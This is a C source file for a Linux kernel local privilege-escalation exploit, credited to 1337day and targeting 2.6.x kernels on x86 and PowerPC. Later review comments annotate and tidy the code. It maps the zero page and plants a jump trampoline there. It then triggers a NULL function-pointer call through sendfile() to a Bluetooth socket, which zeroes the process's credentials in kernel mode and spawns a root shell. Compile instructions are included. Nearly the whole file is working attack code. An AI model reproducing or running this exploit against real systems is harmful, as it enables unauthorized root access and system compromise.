  1. /*
  2.  *
  3.  *
  4.  * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                    
  5.  * 0    _                __         __      __                 1
  6.  * 1   /' \          __  /'__`\       /\ \__  /'__`\                0
  7.  * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___         1
  8.  * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\        0
  9.  * 0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/         1
  10.  * 1     \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\         0
  11.  * 0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/         1
  12.  * 1               \ \____/ >> Exploit database separated by exploit   0
  13.  * 0                \/___/        type (local, remote, DoS, etc.)    1
  14.  * 1                                                        0
  15.  * 0  By CrosS                                                1
  16.  * 1                                                        0
  17.  * 0  Linux 2011                                               1
  18.  * 1                                                        0
  19.  * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
  20.  *
  21.  * Linux 2.6.18-128.el5
  22.  * Linux 2.6.9-89.EL
  23.  * Ubuntu 8.10 Linux 2.6.27
  24.  *
  25.  * For i386 and 32-bit PowerPC, compile with:
  26.  * gcc -w -o exploit exploit.c
  27.  *
  28.  * For x86_64 and ppc64 kernels, compile with:
  29.  * gcc -w -m64 -o exploit exploit.c
  30.  *
  31.  * Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
  32.  *
  33.  * Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
  34.  *
  35.  * For educational purposes only.
  36.  */
  37.  
  38. #include <stdio.h>
  39. #include <stdlib.h>
  40. #include <string.h>
  41. #include <sys/mman.h>
  42. #include <sys/sendfile.h>
  43. #include <sys/types.h>
  44. #include <sys/socket.h>
  45. #include <unistd.h>
  46.  
/*
 * Fallback for toolchains whose headers do not provide __always_inline
 * (recent glibc defines it in <sys/cdefs.h>, in which case this is skipped).
 * The helpers below rely on being inlined into their caller: they read the
 * stack pointer and walk from it, so a separate call frame would change
 * what they see.
 */
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
  50.  
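/*
 * current_stack_pointer - read the stack pointer of the calling context.
 *
 * Returns the raw value of the architecture's stack-pointer register
 * (%rsp / %esp on x86, r1 on PowerPC). The function is forced inline so the
 * value is the caller's own stack pointer rather than that of a separate
 * frame; the callers mask it to a stack-size boundary to find thread_info /
 * task_struct, which only yields something meaningful when this executes on
 * a kernel stack.
 *
 * __asm__/__volatile__ are used instead of the bare asm keyword so the file
 * also builds under strict -std=c99/c11 modes, and an unsupported target is
 * reported at preprocessing time instead of as a missing symbol at link time.
 */
#if defined(__i386__) || defined(__x86_64__) || \
    defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
    unsigned long sp;

#if (defined(__i386__) || defined(__x86_64__)) && defined(__LP64__)
    /* 64-bit x86: the full %rsp. */
    __asm__ __volatile__ ("movq %%rsp,%0" : "=r" (sp));
#elif defined(__i386__) || defined(__x86_64__)
    /* 32-bit x86 (or a 64-bit compiler in a 32-bit data model): %esp. */
    __asm__ __volatile__ ("movl %%esp,%0" : "=r" (sp));
#else
    /* PowerPC, 32- and 64-bit alike: r1 is the stack pointer. */
    __asm__ __volatile__ ("mr %0,%%r1" : "=r" (sp));
#endif

    return sp;
}
#else
#error "current_stack_pointer: unsupported architecture"
#endif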
  88.  
/*
 * current_task_struct - locate the task_struct of the running task.
 *
 * Meant to run while this process is executing in kernel mode (main() makes
 * the kernel call into the page mapped at address 0). Returns the
 * task_struct address, or (unsigned long)-1 when no plausible candidate is
 * found. The 64-bit x86 variant reads a per-CPU pointer and cannot fail; the
 * others guess from the stack pointer and validate each guess with
 * looks_running().
 *
 * NOTE(review): the stack-size masks (4K thread_info, 8K / 16K stacks), the
 * "first word of thread_info is the task pointer" layout and the %gs:0
 * per-CPU slot are all tied to the 2.6.x kernels named in the file header.
 * Nothing here validates them beyond the TASK_RUNNING probe, so a wrong
 * guess dereferences an arbitrary address in kernel context.
 */
#define TASK_RUNNING 0

/*
 * looks_running - true when the word at @candidate reads TASK_RUNNING.
 *
 * The code assumes task_struct->state is the first field and that a task
 * executing this code can only be TASK_RUNNING, so this is the sanity probe
 * applied to every guessed task_struct address. Dereferences @candidate
 * unconditionally.
 */
static __always_inline int
looks_running(unsigned long candidate)
{
    return *(unsigned long *)candidate == TASK_RUNNING;
}

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(void)
{
    unsigned long task;

    /*
     * x86-64: the first word of the per-CPU area addressed by the kernel %gs
     * is taken to be the current task pointer. Only meaningful with the
     * kernel's %gs base loaded, i.e. in kernel mode.
     */
    __asm__ __volatile__ ("movq %%gs:0,%0" : "=r" (task));

    return task;
}

#else
static __always_inline unsigned long
current_task_struct(void)
{
    unsigned long sp = current_stack_pointer();
    unsigned long task;

    /*
     * 2.6 layout: thread_info sits at the bottom of a 4K-aligned stack and
     * its first word points at the task_struct, which must be a kernel
     * address (>= 0xc0000000 on a 3G/1G split).
     */
    task = *(unsigned long *)(sp & ~(4096UL - 1));
    if (task >= 0xc0000000 && looks_running(task))
        return task;

    /*
     * 8K stacks: either the task_struct itself sits at the stack base
     * (pre-2.6 layout) or thread_info does, with the task pointer first.
     */
    task = sp & ~(8192UL - 1);
    if (looks_running(task))
        return task;

    task = *(unsigned long *)task;
    if (looks_running(task))
        return task;

    return (unsigned long)-1;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_task_struct(void)
{
#if defined(__LP64__)
    /* ppc64: 16K stacks. */
    unsigned long task = current_stack_pointer() & ~(16384UL - 1);
#else
    /* ppc32: 8K stacks. */
    unsigned long task = current_stack_pointer() & ~(8192UL - 1);
#endif

    /* task_struct at the stack base, or thread_info there with the task
     * pointer as its first word. */
    if (looks_running(task))
        return task;

    task = *(unsigned long *)task;
    if (looks_running(task))
        return task;

    return (unsigned long)-1;
}

#endif
  173.  
/*
 * change_cred - runs in kernel context; scans forward from the current
 * task_struct for eight consecutive 32-bit credential fields and zeroes
 * them, i.e. makes this task root.
 *
 * x86: the fields must read uid,uid,uid,uid,gid,gid,gid,gid, where uid/gid
 * are this process's ids captured in main() before the kernel is entered
 * (presumably uid/euid/suid/fsuid and gid/egid/sgid/fsgid of the targeted
 * task_struct layout; confirm against the target kernel). PowerPC: no
 * globals are used; the first run of four equal non-zero words followed by
 * four equal words is taken.
 *
 * Always returns -1. That value becomes whatever the kernel reports for the
 * sendfile() that triggered us and must not be used to detect success.
 *
 * NOTE(review): the scan has no upper bound -- `for (; p; p++)` only stops
 * when the pointer wraps to zero. If the pattern is absent (different
 * task_struct layout, or a kernel that keeps credentials in a separate
 * struct cred) it walks past the task_struct until it faults in kernel
 * mode, and the PowerPC heuristic can match unrelated data. Bounding the
 * scan to a plausible task_struct size would fail closed instead.
 */
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;

/* True when the eight words at @p equal uid x4 followed by gid x4. */
static __always_inline int
creds_match(const unsigned int *p)
{
    int i;

    for (i = 0; i < 4; i++)
        if (p[i] != uid)
            return 0;
    for (i = 4; i < 8; i++)
        if (p[i] != gid)
            return 0;
    return 1;
}

static int
change_cred(void)
{
    unsigned int *p = (unsigned int *)current_task_struct();
    int i;

    for (; p; p++) {
        if (creds_match(p)) {
            /* Plain stores on purpose: no calls out of kernel context. */
            for (i = 0; i < 8; i++)
                p[i] = 0;
            break;
        }
    }

    return -1;
}

#elif defined(__powerpc__) || defined(__powerpc64__)
/* True when p[0..3] are equal and non-zero and p[4..7] are equal. */
static __always_inline int
creds_match(const unsigned int *p)
{
    if (!p[0])
        return 0;

    return p[1] == p[0] && p[2] == p[0] && p[3] == p[0] &&
           p[5] == p[4] && p[6] == p[4] && p[7] == p[4];
}

static int
change_cred(void)
{
    unsigned int *p = (unsigned int *)current_task_struct();
    int i;

    for (; p; p++) {
        if (creds_match(p)) {
            /* Plain stores on purpose: no calls out of kernel context. */
            for (i = 0; i < 8; i++)
                p[i] = 0;
            break;
        }
    }

    return -1;
}

#endif
  236.  
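/* Size of the scratch file handed to sendfile(). */
#define PAGE_SIZE getpagesize()

/*
 * write_trampoline - fill the page mapped at address 0 with code that
 * transfers control to change_cred(). Whatever in the kernel ends up
 * calling through a NULL function pointer lands here.
 *
 * x86-64: ff 24 25 <disp32>  jmp *disp32  -> jumps via the pointer at 0x8
 * i386:   ff 25    <disp32>  jmp *disp32  -> same, 32-bit encoding
 *         In both cases the slot at page+8 holds change_cred's address; the
 *         displacement is written as exactly 4 bytes with memcpy() (the
 *         original stored a full unsigned long through a misaligned cast).
 * ppc64:  the 64-bit ELF ABI calls through function descriptors, so the
 *         page is made to look like one by copying change_cred's entry word.
 * ppc32:  lis r31,hi ; ori r31,r31,lo ; mtctr r31 ; bctr
 *         The original computed hi as `(unsigned short)change_cred >> 16`,
 *         which truncates to 16 bits before shifting and always yields 0;
 *         the shift is now done on the full address.
 *
 * @page must be the writable, executable page at address 0.
 */
static void
write_trampoline(char *page)
{
#if defined(__i386__) || defined(__x86_64__)
    unsigned int slot = 8;
    unsigned long target = (unsigned long)change_cred;

#if defined(__LP64__)
    page[0] = '\xff';
    page[1] = '\x24';
    page[2] = '\x25';
    memcpy(&page[3], &slot, sizeof slot);
#else
    page[0] = '\xff';
    page[1] = '\x25';
    memcpy(&page[2], &slot, sizeof slot);
#endif
    memcpy(&page[8], &target, sizeof target);

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    /* Fake function descriptor: first word is the entry point. */
    *(unsigned long *)&page[0] = *(unsigned long *)change_cred;
#else
    unsigned long target = (unsigned long)change_cred;
    unsigned short hi = (unsigned short)(target >> 16);
    unsigned short lo = (unsigned short)(target & 0xffff);

    page[0] = '\x3f';                 /* lis r31,hi      */
    page[1] = '\xe0';
    memcpy(&page[2], &hi, sizeof hi);
    page[4] = '\x63';                 /* ori r31,r31,lo  */
    page[5] = '\xff';
    memcpy(&page[6], &lo, sizeof lo);
    page[8] = '\x7f';                 /* mtctr r31       */
    page[9] = '\xe9';
    page[10] = '\x03';
    page[11] = '\xa6';
    page[12] = '\x4e';                /* bctr            */
    page[13] = '\x80';
    page[14] = '\x04';
    page[15] = '\x20';
#endif
#endif
}

/*
 * main - map the zero page, plant a trampoline to change_cred() there, then
 * make the kernel call through a NULL function pointer so change_cred() runs
 * in kernel mode and rewrites this task's credentials.
 *
 * The trigger is sendfile() from a one-page scratch file to a PF_BLUETOOTH
 * datagram socket. NOTE(review): this has the shape of the sock_sendpage()
 * NULL-pointer technique (CVE-2009-2692), but the listing never names it, so
 * treat that attribution as unconfirmed. Either way it needs (a) an mmap()
 * of address 0, which vm.mmap_min_addr refuses on current kernels (the
 * perror("mmap") below is where that shows up), and (b) a kernel that will
 * execute user-mapped memory from kernel mode (SMEP, where available, stops
 * that).
 *
 * Compared with the original listing: a shell is only spawned once getuid()
 * confirms the credentials were actually changed, execl() failure is
 * reported instead of exiting successfully, and the scratch descriptors
 * are closed before the shell inherits them.
 *
 * Returns EXIT_FAILURE on any error; on success execl() replaces the process.
 */
int
main(void)
{
    char *page;
    int out_fd, in_fd;
    char tmpl[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
    /* change_cred() searches the task_struct for exactly these values. */
    uid = getuid();
    gid = getgid();
#endif

    /*
     * Map the zero page RWX. With MAP_FIXED the kernel either honours
     * address 0 or fails. Do not compare `page` against NULL before writing
     * through it: a compiler that can prove the pointer is null may replace
     * the stores with a trap (GCC's -fisolate-erroneous-paths-dereference).
     */
    page = mmap(NULL, 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

    write_trampoline(page);

    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    /* One-page, already-unlinked scratch file as the sendfile() source. */
    if ((in_fd = mkstemp(tmpl)) == -1) {
        perror("mkstemp");
        exit(EXIT_FAILURE);
    }
    if (unlink(tmpl) == -1) {
        perror("unlink");
        exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
        perror("ftruncate");
        exit(EXIT_FAILURE);
    }

    /*
     * Trigger. The return value is deliberately not used as a success
     * signal: if change_cred() ran, the kernel reports whatever that call
     * returned (-1), not a byte count, so success is checked via getuid().
     */
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

    close(in_fd);
    close(out_fd);

    /* Only hand out a shell if the credentials were actually rewritten. */
    if (getuid() != 0) {
        fprintf(stderr, "exploit failed: still uid %lu\n",
                (unsigned long)getuid());
        exit(EXIT_FAILURE);
    }

    execl("/bin/sh", "sh", "-i", NULL);
    perror("execl");

    exit(EXIT_FAILURE);
}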